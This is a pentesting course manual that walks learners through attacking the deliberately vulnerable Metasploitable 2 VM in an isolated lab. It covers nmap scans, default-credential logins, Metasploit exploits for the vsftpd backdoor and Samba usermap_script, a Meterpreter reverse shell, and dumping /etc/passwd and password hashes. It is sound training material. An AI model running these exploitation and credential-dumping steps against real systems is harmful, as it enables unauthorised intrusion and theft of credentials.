pentest

█▓▒▒░░░ PENTESTING: A PRACTICAL COURSE MANUAL ░░░▒▒▓█

This curriculum is structured around the seven phases of the Penetration Testing Execution Standard (PTES), a framework designed to provide a baseline for conducting high-quality penetration tests. We will cover the essential tools, techniques, and procedures (TTPs) used by security professionals to identify and exploit vulnerabilities. This course is designed to be hands-on, with practical exercises that you can perform on your Debian XFCE system.

Prerequisites: A Debian XFCE system, familiarity with the Linux command line, basic networking knowledge, and virtualization software (e.g., VirtualBox).

壱 - LAB SETUP & METHODOLOGY

Before beginning any engagement, a proper lab and a firm grasp of the methodology are essential. This module covers the setup of your virtual environment and an introduction to the PTES framework that will guide our exercises. A controlled lab is non-negotiable for any offensive security practice; it ensures your activities are legal, safe, and contained, preventing any impact on networks you do not have explicit permission to test.

► CORE CONCEPTS: The PTES Framework

The Penetration Testing Execution Standard (PTES) provides a roadmap for conducting a thorough and professional assessment. Understanding these phases is key to moving beyond simply running tools and toward thinking like an attacker.

1. Pre-engagement Interactions: The business and logistical phase. This involves client meetings, defining the scope (what is and is not in scope for testing), setting rules of engagement (e.g., times of testing, what to do if a critical system goes down), and establishing legal contracts. While we won’t simulate this, it is the most critical phase in a professional setting.

2. Intelligence Gathering: The reconnaissance phase. The goal is to become an expert on the target. This involves collecting technical data (IP ranges, domains, technologies used) and human data (employee names, emails, roles) from public sources (OSINT) and through active network probing. A thorough recon phase dramatically increases the chances of a successful test.

3. Threat Modeling: Using the intelligence gathered, you model potential threats. This means identifying key assets, understanding the business context, and mapping likely attack paths an adversary would take to compromise those assets. It’s a strategic phase that guides the subsequent hands-on testing.

4. Vulnerability Analysis: The process of discovering specific, exploitable weaknesses in the target’s systems. This involves taking the inventory of services from the recon phase and actively probing them for known and unknown vulnerabilities using a combination of automated scanners and manual verification.

5. Exploitation: The “attack” phase. Here, you attempt to gain access to systems by leveraging the vulnerabilities discovered in the previous phase. The goal is to prove that a vulnerability is not just theoretical but has a real-world impact, typically by gaining a command shell or accessing sensitive data.

6. Post-Exploitation: This is what you do after you’ve successfully compromised a system. The objectives are to determine the value of the machine, escalate privileges (e.g., from a regular user to root/administrator), pivot to other systems on the internal network, and maintain access—all while remaining undetected.

7. Reporting: The final deliverable. A professional report communicates the findings to both technical staff and executive management. It details the vulnerabilities, the risk they pose to the business, and provides clear, actionable recommendations for remediation. A test without a good report is a failed test.

► LIVE EXERCISE: Building Your Lab

A safe, isolated lab is critical for practice. We will create a virtual network with an attacker and a target machine.

1. Attacker Machine: Your Debian XFCE installation is your primary attacker machine, often called the “attack box.”

2. Target Machine: Download and install Metasploitable 2, a deliberately vulnerable Linux VM created by Rapid7 for training purposes.
   • Networking: In your virtualization software (VirtualBox/VMware), configure the network adapter for both your Debian VM and your Metasploitable 2 VM to use the same isolated network. A “Host-Only Adapter” in VirtualBox is an excellent choice. This creates a private virtual network where your VMs can communicate with each other but are isolated from your main home network and the internet.
   • Verification: Once both VMs are running, find their IP addresses.
     • On Debian: ip addr
     • On Metasploitable 2 (login: msfadmin/msfadmin): ifconfig
     • From your Debian VM, you should be able to ping the IP address of the Metasploitable 2 VM.
3. Essential Tools Installation: Open a terminal on your Debian machine and install the core toolkit. These tools are the foundation of network-based penetration testing.

   sudo apt update && sudo apt upgrade -y
   sudo apt install nmap wireshark metasploit-framework python3-pip git net-tools enum4linux nikto -y
   

   • nmap: For network discovery and security auditing.
   • wireshark: For deep packet inspection and protocol analysis.
   • metasploit-framework: The premier framework for developing and executing exploits.
   • git: For cloning tools and repositories from sources like GitHub.
   • net-tools: Provides classic tools like ifconfig and netstat.
   • enum4linux: An essential tool for enumerating information from Windows and Samba systems.
   • nikto: A web server scanner that checks for thousands of potentially dangerous files/CGIs, outdated versions, and other common web-related issues.

---

弐 - INTELLIGENCE GATHERING

This module simulates the initial phase of an assessment. We will gather information on our target, Metasploitable 2, as if it were a black box on a network. A thorough and patient approach here pays dividends later.

► LIVE EXERCISE: Active Reconnaissance with Nmap

We will now perform a systematic scan of our lab network to identify our target and build a complete service profile.

1. Host Discovery (Finding the Target): First, let’s identify all live hosts on our lab network.

   # Replace 192.168.56.0/24 with your actual lab network range
   nmap -sn 192.168.56.0/24
   

   • -sn: This is a “ping scan” or “no port scan”. It performs host discovery but does not scan for open ports. On a local network, Nmap will use ARP requests, which is very reliable for finding live hosts. You should see the IP of your Debian machine and your Metasploitable 2 machine.
2. Initial Port Scan (The Quick Look): Now that we have our target IP, let’s do a fast initial scan to get a quick idea of the most common services.

   # Replace [METASPLOITABLE_IP] with the target's IP
   nmap -F -T4 [METASPLOITABLE_IP]
   

   • -F: Fast scan. Scans the 100 most common ports instead of the default 1000.
   • -T4: Aggressive timing template. Assumes a fast, reliable network (which our lab is). This speeds up the scan considerably.
3. Comprehensive Service Scan (The Deep Dive): This is the main scan. We want to identify every open TCP and UDP port, determine the service versions, attempt to identify the OS, and run some safe discovery scripts. This scan will take time.

   sudo nmap -sS -sU -p- -A --reason -oA metasploitable_scan [METASPLOITABLE_IP]
   

   • sudo: Required for -sS (SYN scan) and -sU (UDP scan) as they craft raw packets.
   • -sS: TCP SYN Scan (“half-open” scan). It’s stealthier and faster than a full connect scan.
   • -sU: UDP Scan. This is important as many vulnerable services use UDP (e.g., SNMP, NFS). This part of the scan will be slow.
   • -p-: A shortcut to scan all 65,535 TCP and UDP ports.
   • -A: The aggressive option. This enables OS Detection (-O), Version Detection (-sV), Script Scanning (-sC), and Traceroute. It’s a powerful and convenient combination.
   • --reason: Shows the reason Nmap concluded a port is in a certain state (e.g., syn-ack for open). This is very useful for understanding the results.
   • -oA metasploitable_scan: Saves the output in all major formats (.nmap, .gnmap, .xml) with the basename “metasploitable_scan”. Saving your work is critical. We will refer to this file for the rest of the assessment.

---

参 - VULNERABILITY ANALYSIS

With our comprehensive Nmap scan results, we now transition to analyzing each discovered service for potential weaknesses. This is a methodical process of investigation, not just blind firing of exploits. We will use the metasploitable_scan.nmap file as our guide.

► LIVE EXERCISE: Systematic Service Enumeration

Go through your Nmap output port by port. For each service, perform a manual investigation.

1. Port 21/tcp - FTP (vsftpd 2.3.4):
   • Manual Banner Grab: The Nmap scan already gave us the version. Let’s confirm.

       nc -nv [METASPLOITABLE_IP] 21
     

     • nc: Netcat, the “swiss-army knife” for networking.
     • -n: Don’t resolve DNS. -v: Verbose.
   • Vulnerability Research: A quick search for “vsftpd 2.3.4 exploit” reveals a famous backdoor. This is a prime candidate for exploitation. We will use the command-line search tool for Exploit-DB.

       searchsploit vsftpd 2.3.4
     

2. Port 23/tcp - Telnet (Linux telnetd):
   • Analysis: Telnet is an unencrypted protocol. Any credentials sent over the wire can be captured. This is a vulnerability in itself.
   • Action: Let’s test for default or weak credentials.

       telnet [METASPLOITABLE_IP]
     

     • Try logging in with common defaults like root:root, admin:admin, or msfadmin:msfadmin. The last one will work.
3. Port 80/tcp - HTTP (Apache httpd 2.2.8):
   • Manual Enumeration: Open a web browser on your Debian machine and navigate to http://[METASPLOITABLE_IP]. Click around the website. You will find a phpinfo.php page (reveals detailed configuration) and a TWiki installation, among other things.
   • Automated Web Scanning with Nikto: Nikto is a web scanner that looks for dangerous files, outdated software, and other common misconfigurations.

       nikto -h http://[METASPLOITABLE_IP]
     

     • Review the output for any interesting findings. Nikto will likely find the TWiki directory and other potential issues.
4. Port 139/tcp & 445/tcp - Samba (smbd 3.0.20):
   • Analysis: Samba provides file and print services for Windows clients. It is a frequent source of vulnerabilities.
   • Enumeration with enum4linux: This tool is specifically designed to query Samba for information.

       enum4linux -a [METASPLOITABLE_IP]
     

     • -a: Run all simple enumeration options. This will attempt to dump user lists, share lists, password policy, and more. The output is verbose and extremely valuable.
5. Port 5432/tcp - PostgreSQL:
   • Analysis: This is a database server. A common vulnerability is weak or default credentials.
   • Action: We can try to connect using the psql client.

       # Try connecting with the default user 'postgres' and a blank or common password.
       psql -h [METASPLOITABLE_IP] -U postgres
     

     • You’ll find that the default configuration allows you to log in without a password.

This systematic process of taking an Nmap scan and investigating each service is the core of the vulnerability analysis phase. You have now identified multiple, highly probable attack vectors.

---

四 - EXPLOITATION

This module covers the process of actively exploiting the vulnerabilities we’ve validated. We will use the Metasploit Framework to gain access to our target.

► LIVE EXERCISE: Gaining Initial Access with Metasploit

We will start with the vsftpd backdoor, as it is a simple and reliable exploit.

1. Start and Prepare Metasploit:

   sudo systemctl start postgresql
   msfconsole -q
   

2. Search and Select the Exploit:

   msf6 > search vsftpd
   msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
   

3. Configure and Launch:

   msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
   msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS [METASPLOITABLE_IP]
   msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
   

4. Success: You should see “Command shell session 1 opened”. You have a root shell. Type whoami; id to confirm. Type exit to return to msfconsole.

► LIVE EXERCISE: A More Advanced Exploit (Samba)

Now let’s exploit the Samba service we enumerated earlier. This will require us to configure a payload.

1. Search for the Exploit: Based on our enum4linux results and some research, the usermap_script vulnerability is a good candidate for Samba 3.0.20.

   msf6 > search usermap_script
   msf6 > use exploit/multi/samba/usermap_script
   

2. View Options and Payloads:

   msf6 exploit(multi/samba/usermap_script) > show options
   msf6 exploit(multi/samba/usermap_script) > show payloads
   

   • Notice that this exploit can deliver many different payloads. The default is a generic command shell.
3. Set Options: We only need to set the remote host.

   msf6 exploit(multi/samba/usermap_script) > set RHOSTS [METASPLOITABLE_IP]
   

4. Exploit:

   msf6 exploit(multi/samba/usermap_script) > exploit
   

5. Success Again: Another root shell. You have now compromised the machine in two different ways. This demonstrates that systems often have multiple points of failure.

---

五 - POST-EXPLOITATION

Gaining access is just the beginning. Now we must understand the compromised system, escalate privileges if necessary (we are already root, but we’ll practice the technique), and see if we can pivot to other systems. For this, we will use Metasploit’s most powerful payload: Meterpreter.

► LIVE EXERCISE: Using Meterpreter

Let’s re-exploit the Samba vulnerability, but this time, we’ll use a Meterpreter payload to unlock advanced post-exploitation capabilities.

1. Select the Exploit and Set Target:

   msf6 > use exploit/multi/samba/usermap_script
   msf6 > set RHOSTS [METASPLOITABLE_IP]
   

2. Set a Meterpreter Payload:

   msf6 exploit(multi/samba/usermap_script) > set payload linux/x86/meterpreter/reverse_tcp
   

   • reverse_tcp: The most common payload type. The compromised target will connect back to a listener on our machine. This is often successful even through firewalls.
3. Configure the Payload: A reverse payload needs to know where to connect back to.

   msf6 exploit(multi/samba/usermap_script) > show options
   # Notice the new LHOST and LPORT options
   msf6 exploit(multi/samba/usermap_script) > set LHOST [YOUR_DEBIAN_IP]
   

   • LHOST: The “Local Host”. This MUST be the IP of your Debian attack box. Use ip addr in another terminal to find it.
4. Launch the Exploit:

   msf6 exploit(multi/samba/usermap_script) > exploit
   

5. Interact with Meterpreter: If successful, you’ll get a meterpreter > prompt. This is not a standard shell; it’s a powerful, extensible command interpreter running in the memory of the target process.
   • sysinfo: Get target system information.
   • getuid: See the current user (root).
   • ps: List running processes on the target.
   • ls: List files in the current directory on the target.
   • pwd: Show the current working directory on the target.
   • download /etc/passwd .: Download the target’s password file to your current directory (/root/ on your Debian box).
   • hashdump: Dumps the contents of the SAM file (password hashes). Since this is Linux, it will dump the contents of /etc/shadow.
   • run post/linux/gather/enum_configs: Meterpreter has post-exploitation modules. This one gathers common configuration files from the target.
   • background: Send the Meterpreter session to the background without closing it. You can list active sessions with sessions and re-enter one with sessions -i <ID>.

---

六 - REPORTING

The final, and arguably most important, phase of a penetration test is documenting your findings in a clear and actionable report. A report is the tangible result of your work and the primary tool for driving remediation.

► THE STRUCTURE OF A PROFESSIONAL REPORT

A good report is a narrative that tells the story of the attack and its business impact. It should always include:

• Executive Summary: A 1-2 page, non-technical overview for management. It should state the overall risk posture, highlight the most critical findings, and summarize the potential business impact (e.g., “A critical vulnerability was discovered that could lead to a full compromise of customer data…”).
• Methodology: A brief description of the approach used (e.g., “This assessment followed the PTES methodology…”).
• Scope: A clear definition of what was and was not tested (IP ranges, applications, etc.).
• Findings: The core of the report. Each vulnerability should be its own section, detailed with the following components.
• Conclusion: A summary of the technical findings and a final assessment of the security posture.

► PRACTICAL EXERCISE: Writing a Detailed Finding

Using Markdown, write a sample vulnerability finding for the Samba usermap_script exploit.

• Vulnerability Title: Remote Command Execution in Samba
• Severity: Critical
• CVSS Score: 10.0 (Critical)
• Host(s) Affected: [METASPLOITABLE_IP]
• Description: The version of Samba (3.0.20) running on the affected host is vulnerable to a remote command execution flaw. An unauthenticated, remote attacker can send a specially crafted username to the server, which is then executed as a system command with root privileges. This is due to a vulnerability in the usermap_script feature.
• Evidence of Exploit (Proof of Concept):

  The Metasploit Framework module exploit/multi/samba/usermap_script was used to demonstrate this vulnerability. The following commands were executed:

  msf6 > use exploit/multi/samba/usermap_script
  msf6 exploit(multi/samba/usermap_script) > set RHOSTS [METASPLOITABLE_IP]
  msf6 exploit(multi/samba/usermap_script) > exploit
  [*] Started reverse TCP handler on [YOUR_DEBIAN_IP]:4444
  [*] Command shell session 1 opened ([YOUR_DEBIAN_IP]:4444 -> [METASPLOITABLE_IP]:44321)
  
  whoami
  root
  

• Business Impact: Successful exploitation of this vulnerability results in a complete compromise of the affected server. An attacker gains full administrative (root) control, allowing them to read, modify, or delete any data on the system, install persistent backdoors, and use the compromised server as a pivot point to attack other systems on the internal network.
• Recommendation: Immediately upgrade the Samba package to a version not affected by this vulnerability (later than 3.0.25d). If an upgrade is not possible, ensure the usermap_script option is disabled in the smb.conf configuration file.

---

七 - ADVANCED TOPICS & CAREER PATHS

This course provides a foundation. The world of offensive security is vast and requires continuous learning.

► WHERE TO GO FROM HERE

• Practice, Practice, Practice: The key to mastery is hands-on experience. Use platforms like Hack The Box, TryHackMe, and VulnHub to tackle a wide variety of vulnerable machines legally.
• Specialize: Find an area that interests you. Common specializations include:
  • Web Application Pentesting: Focus on the OWASP Top 10 and tools like Burp Suite.
  • Active Directory Attacks: Learn the TTPs for compromising Windows enterprise environments.
  • Wireless Hacking: Learn the intricacies of 802.11 security.
• Certifications: Certifications can validate your skills to potential employers. The OSCP (Offensive Security Certified Professional) is a highly respected, hands-on certification that is a common goal for aspiring penetration testers.

► THE ROLE OF A SOC ANALYST

Why should a defender learn to attack? Understanding attacker TTPs is the most effective way to become a high-performing defender. A SOC analyst with this knowledge can:

• Improve Alert Triage: Recognize the difference between scanner noise and a real, targeted attack.
• Conduct Threat Hunting: Proactively search for signs of compromise using knowledge of how attackers operate post-exploitation.
• Understand Log Data: When you see logs from Nmap, Metasploit, or other tools, you’ll know exactly what the attacker is doing and can respond more effectively.
• Validate Security Controls: Understand how attackers bypass firewalls, antivirus, and other defenses, allowing you to recommend and implement more robust solutions.

This site is open source. Improve this page.